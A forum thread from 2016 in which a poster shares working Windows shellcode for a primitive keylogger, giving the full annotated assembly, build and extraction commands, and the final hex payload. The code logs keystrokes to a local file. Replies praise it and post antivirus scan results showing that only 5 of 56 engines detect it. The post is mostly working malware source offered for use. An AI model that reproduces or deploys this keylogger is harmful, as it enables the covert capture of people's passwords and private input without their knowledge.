fugu Posted April 23, 2016 Share Posted April 23, 2016 I hope the formatting holds up ; Exploit Title: All windows null free shellcode - primitave keylogger to file - 431 (0x01AF) bytes ; Date: Sat Apr 23 18:34:25 GMT 2016 ; Exploit Author: Fugu ; Vendor Homepage: www.microsoft.com ; Version: all afaik ; Tested on: Win7 (im guessing it will work on others) ; Note: it will write to "log.bin" in the same directory as the exe, iff that DIR is writable. ; it is kinda spammy to the logfile, and will grow quickly. keystrokes are saved in format: ; "Virtual-Key Codes", from msdn.microsoft.com website ; nasm -f win32 test.asm && i686-w64-mingw32-ld -o test.exe test.obj ; dd if=test.exe bs=1 status=none skip=$((0x200)) count=$((0x3AE-0x200+1)) | xxd -ps | tr -d '\n'; echo section .bss section .data section .text global _start _start: cld ; 00000000 FC xor edx,edx ; 00000001 31D2 mov dl,0x30 ; 00000003 B230 push dword [fs:edx] ; 00000005 64FF32 pop edx ; 00000008 5A mov edx,[edx+0xc] ; 00000009 8B520C mov edx,[edx+0x14] ; 0000000C 8B5214 loc_fh: mov esi,[edx+0x28] ; 0000000F 8B7228 xor eax,eax ; 00000012 31C0 mov ecx,eax ; 00000014 89C1 mov cl,0x3 ; 00000016 B103 loc_18h: lodsb ; 00000018 AC rol eax,byte 0x8 ; 00000019 C1C008 lodsb ; 0000001C AC loop loc_18h ; 0000001D E2F9 lodsb ; 0000001F AC cmp eax,0x4b45524e ; 00000020 3D4E52454B jz loc_2ch ; 00000025 7405 cmp eax,0x6b65726e ; 00000027 3D6E72656B loc_2ch: mov ebx,[edx+0x10] ; 0000002C 8B5A10 mov edx,[edx] ; 0000002F 8B12 jnz loc_fh ; 00000031 75DC mov edx,[ebx+0x3c] ; 00000033 8B533C add edx,ebx ; 00000036 01DA push dword [edx+0x34] ; 00000038 FF7234 mov edx,[edx+0x78] ; 0000003B 8B5278 add edx,ebx ; 0000003E 01DA mov esi,[edx+0x20] ; 00000040 8B7220 add esi,ebx ; 00000043 01DE ;GetProcAddress xor ecx,ecx ; 00000045 31C9 loc_47h: inc ecx ; 00000047 41 lodsd ; 00000048 AD add eax,ebx ; 00000049 01D8 cmp dword [eax],0x50746547 ; 0000004B 813847657450 jnz loc_47h ; 00000051 75F4 cmp dword [eax+0x4],0x41636f72 ; 00000053 817804726F6341 jnz loc_47h ; 0000005A 75EB cmp dword [eax+0x8],0x65726464 ; 0000005C 81780864647265 jnz loc_47h ; 00000063 75E2 dec ecx ; 00000065 49 mov esi,[edx+0x24] ; 00000066 8B7224 add esi,ebx ; 00000069 01DE mov cx,[esi+ecx*2] ; 0000006B 668B0C4E mov esi,[edx+0x1c] ; 0000006F 8B721C add esi,ebx ; 00000072 01DE mov edx,[esi+ecx*4] ; 00000074 8B148E add edx,ebx ; 00000077 01DA mov edi,edx ; 00000079 89D7 push edx ; 0000007B 52 ;GetModuleHandleA xor eax,eax ; 0000007C 31C0 push eax ; 0000007E 50 push dword 0x41656c64 ; 0000007F 68646C6541 push dword 0x6e614865 ; 00000084 686548616E push dword 0x6c75646f ; 00000089 686F64756C push dword 0x4d746547 ; 0000008E 684765744D push esp ; 00000093 54 push ebx ; 00000094 53 call edi ; 00000095 FFD7 lea esp,[esp+0x14] ; 00000097 8D642414 push eax ; 0000009B 50 ;GetModuleHandleA("USER32.DLL") push dword 0x88014c4c ; 0000009C 684C4C0188 dec byte [esp+0x2] ; 000000A1 FE4C2402 push dword 0x442e3233 ; 000000A5 6833322E44 push dword 0x52455355 ; 000000AA 6855534552 push esp ; 000000AF 54 call eax ; 000000B0 FFD0 xor edx,edx ; 000000B2 31D2 cmp eax,edx ; 000000B4 39D0 jnz loc_f0h ; 000000B6 7538 lea esp,[esp+0xc] ; 000000B8 8D64240C ;LoadLibraryA push edx ; 000000BC 52 push dword 0x41797261 ; 000000BD 6861727941 push dword 0x7262694c ; 000000C2 684C696272 push dword 0x64616f4c ; 000000C7 684C6F6164 push esp ; 000000CC 54 push ebx ; 000000CD 53 call edi ; 000000CE FFD7 lea esp,[esp+0x10] ; 000000D0 8D642410 push eax ; 000000D4 50 ;LoadLibraryA("USER32.DLL") push dword 0x77014c4c ; 000000D5 684C4C0177 dec byte [esp+0x2] ; 000000DA FE4C2402 push dword 0x442e3233 ; 000000DE 6833322E44 push dword 0x52455355 ; 000000E3 6855534552 push esp ; 000000E8 54 call eax ; 000000E9 FFD0 lea esp,[esp+0xc] ; 000000EB 8D64240C push eax ; 000000EF 50 ;GetKeyState loc_f0h: mov edx,eax ; 000000F0 89C2 push dword 0x1657461 ; 000000F2 6861746501 dec byte [esp+0x3] ; 000000F7 FE4C2403 push dword 0x74537965 ; 000000FB 6865795374 push dword 0x4b746547 ; 00000100 684765744B push esp ; 00000105 54 push edx ; 00000106 52 call edi ; 00000107 FFD7 lea esp,[esp+0xc] ; 00000109 8D64240C push eax ; 0000010D 50 ;WriteFile push dword 0x55010165 ; 0000010E 6865010155 dec byte [esp+0x1] ; 00000113 FE4C2401 push dword 0x6c694665 ; 00000117 686546696C push dword 0x74697257 ; 0000011C 6857726974 push esp ; 00000121 54 push ebx ; 00000122 53 call edi ; 00000123 FFD7 lea esp,[esp+0xc] ; 00000125 8D64240C push eax ; 00000129 50 ;CreateFileA push dword 0x141656c ; 0000012A 686C654101 dec byte [esp+0x3] ; 0000012F FE4C2403 push dword 0x69466574 ; 00000133 6874654669 push dword 0x61657243 ; 00000138 6843726561 push esp ; 0000013D 54 push ebx ; 0000013E 53 call edi ; 0000013F FFD7 lea esp,[esp+0xc] ; 00000141 8D64240C push eax ; 00000145 50 push dword 0x16e6962 ; 00000146 6862696E01 dec byte [esp+0x3] ; 0000014B FE4C2403 push dword 0x2e676f6c ; 0000014F 686C6F672E xor ecx,ecx ; 00000154 31C9 push ecx ; 00000156 51 push ecx ; 00000157 51 add byte [esp],0x80 ; 00000158 80042480 push byte +0x4 ; 0000015C 6A04 push ecx ; 0000015E 51 push byte +0x2 ; 0000015F 6A02 push ecx ; 00000161 51 add byte [esp],0x4 ; 00000162 80042404 lea ecx,[esp+0x18] ; 00000166 8D4C2418 push ecx ; 0000016A 51 call eax ; 0000016B FFD0 lea esp,[esp+0x8] ; 0000016D 8D642408 push eax ; 00000171 50 ;main loop loc_172h: xor ecx,ecx ; 00000172 31C9 xor esi,esi ; 00000174 31F6 loc_176h: mov cl,0xff ; 00000176 B1FF mov eax,esi ; 00000178 89F0 cmp al,cl ; 0000017A 38C8 jc loc_180h ; 0000017C 7202 xor esi,esi ; 0000017E 31F6 loc_180h: inc esi ; 00000180 46 push esi ; 00000181 56 call dword [esp+0x10] ; 00000182 FF542410 mov edx,esi ; 00000186 89F2 xor ecx,ecx ; 00000188 31C9 mov cl,0x80 ; 0000018A B180 and eax,ecx ; 0000018C 21C8 xor ecx,ecx ; 0000018E 31C9 cmp eax,ecx ; 00000190 39C8 jz loc_176h ; 00000192 74E2 push edx ; 00000194 52 push ecx ; 00000195 51 lea ecx,[esp] ; 00000196 8D0C24 push ecx ; 00000199 51 push byte +0x1 ; 0000019A 6A01 lea ecx,[esp+0xc] ; 0000019C 8D4C240C push ecx ; 000001A0 51 push dword [esp+0x14] ; 000001A1 FF742414 call dword [esp+0x20] ; 000001A5 FF542420 lea esp,[esp+0x4] ; 000001A9 8D642404 jmp short loc_172h ; 000001AD EBC3 ;the actual shellcode fc31d2b23064ff325a8b520c8b52148b722831c089c1b103acc1c008ace2f9ac3d4e52454b74053d6e72656b8b5a108b1275dc8b533c01daff72348b527801da8b722001de31c941ad01d881384765745075f4817804726f634175eb8178086464726575e2498b722401de668b0c4e8b721c01de8b148e01da89d75231c05068646c6541686548616e686f64756c684765744d5453ffd78d64241450684c4c0188fe4c24026833322e44685553455254ffd031d239d075388d64240c526861727941684c696272684c6f61645453ffd78d64241050684c4c0177fe4c24026833322e44685553455254ffd08d64240c5089c26861746501fe4c24036865795374684765744b5452ffd78d64240c506865010155fe4c2401686546696c68577269745453ffd78d64240c50686c654101fe4c2403687465466968437265615453ffd78d64240c506862696e01fe4c2403686c6f672e31c95151800424806a04516a0251800424048d4c241851ffd08d6424085031c931f6b1ff89f038c8720231f64656ff54241089f231c9b18021c831c939c874e252518d0c24516a018d4c240c51ff742414ff5424208d642404ebc3 Quote Link to comment Share on other sites More sharing options...
i8igmac Posted April 23, 2016 Share Posted April 23, 2016 Noice ^^ Quote Link to comment Share on other sites More sharing options...
fugu Posted April 24, 2016 Author Share Posted April 24, 2016 Thank you! Quote Link to comment Share on other sites More sharing options...
i8igmac Posted April 27, 2016 Share Posted April 27, 2016 can you show virus scan results? Quote Link to comment Share on other sites More sharing options...
fugu Posted April 27, 2016 Author Share Posted April 27, 2016 can you show virus scan results? SHA256: 525dd24ac394e238404fe08504891bab80168c80fba1e396827a8683b697845c File name: test.exe Detection ratio: 5 / 56 Analysis date: 2016-04-27 04:09:53 UTC ( 1 minute ago ) 0 0 Analysis File detail Additional information Comments Votes Behavioural information Antivirus Result Update Avira (no cloud) TR/Crypt.XPACK.Gen 20160426 NANO-Antivirus Virus.Win32.Gen.ccmw 20160427 Qihoo-360 HEUR/QVM20.1.0000.Malware.Gen 20160427 Sophos Mal/EncPk-ND 20160427 VBA32 Heur.Trojan.Hlux 20160425 ALYac 20160427 AVG 20160427 AVware 20160427 Ad-Aware 20160427 AegisLab 20160426 AhnLab-V3 20160426 Alibaba 20160426 Antiy-AVL 20160427 Arcabit 20160427 Avast 20160427 Baidu 20160426 Baidu-International 20160426 BitDefender 20160427 Bkav 20160427 CAT-QuickHeal 20160427 CMC 20160425 ClamAV 20160426 Comodo 20160426 Cyren 20160427 DrWeb 20160427 ESET-NOD32 20160427 Emsisoft 20160427 F-Prot 20160427 F-Secure 20160427 Fortinet 20160425 GData 20160427 Ikarus 20160426 Jiangmin 20160427 K7AntiVirus 20160426 K7GW 20160427 Kaspersky 20160427 Kingsoft 20160427 Malwarebytes 20160427 McAfee 20160427 McAfee-GW-Edition 20160427 eScan 20160427 Microsoft 20160427 Panda 20160426 Rising 20160427 SUPERAntiSpyware 20160427 Symantec 20160427 Tencent 20160427 TheHacker 20160426 TrendMicro 20160427 TrendMicro-HouseCall 20160427 VIPRE 20160427 ViRobot 20160427 Yandex 20160426 Zillya 20160426 Zoner 20160427 nProtect 20160426 Quote Link to comment Share on other sites More sharing options...
AllCNICoFounder Posted June 9, 2016 Share Posted June 9, 2016 Thank you so much for this <: Quote Link to comment Share on other sites More sharing options...
fugu Posted June 11, 2016 Author Share Posted June 11, 2016 On 6/9/2016 at 11:22 AM, AllCNICoFounder said: Thank you so much for this <: No problem:) There is a slightly better version of this at the Exploit DB www.exploit-db.com under shellcodes, which doesn't spam the log file or bog down the CPU. Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.